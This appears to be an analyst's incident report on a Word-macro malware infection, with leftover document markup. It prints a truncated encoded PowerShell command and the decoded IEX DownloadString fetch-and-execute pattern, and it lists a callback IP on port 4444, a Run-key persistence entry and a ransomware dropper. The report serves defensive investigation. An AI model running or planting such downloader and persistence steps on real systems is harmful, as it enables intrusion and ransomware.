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Key Findings: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Suspicious Process: powershell.exe (PID 4421) Spawned by winword.exe (PID 1288) — a word document executed a VBA macro that launched PowerShell with a Base64 encoded command (IEX downloader pattern). This is a classic malicious macro dropper technique. </w:t>
      </w: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powershell.exe -EncodedCommand SQBFAFgA…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Decoded:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> IEX (New-Object Net.WebClient).DownloadString — downloads and executes remote payload in memory.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IP Reputation (VirusTotal): Clean — no vendors flagged 185.130.5.253 as malicious at time of investigation.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clean VirusTotal result does not confirm the IP is safe. This is a common real-world scenario — newly registered C2 infrastructure, private Metasploit listeners, or attacker- controlled VPS servers frequently appear clean on public threat intel platforms because they have not yet been reported. The behavioral evidence (powershell.exe outbound to port 4444 from a Word macro execution chain) is sufficient to classify this as malicious regardless of reputation score.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Probable Malware: Ransomware dropper — svcboost.exe File dropped to C:\Users\Alex\AppData\Roaming\svcboost.exe Registry key added for persistence: HKLM\Software\Microsoft\Windows\CurrentVersion\Run\svcboost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Ransomware popup observed: "Your files are encrypted. Pay 0.5 BTC to recover." File encryption confirmed on .docx and .xlsx in Documents..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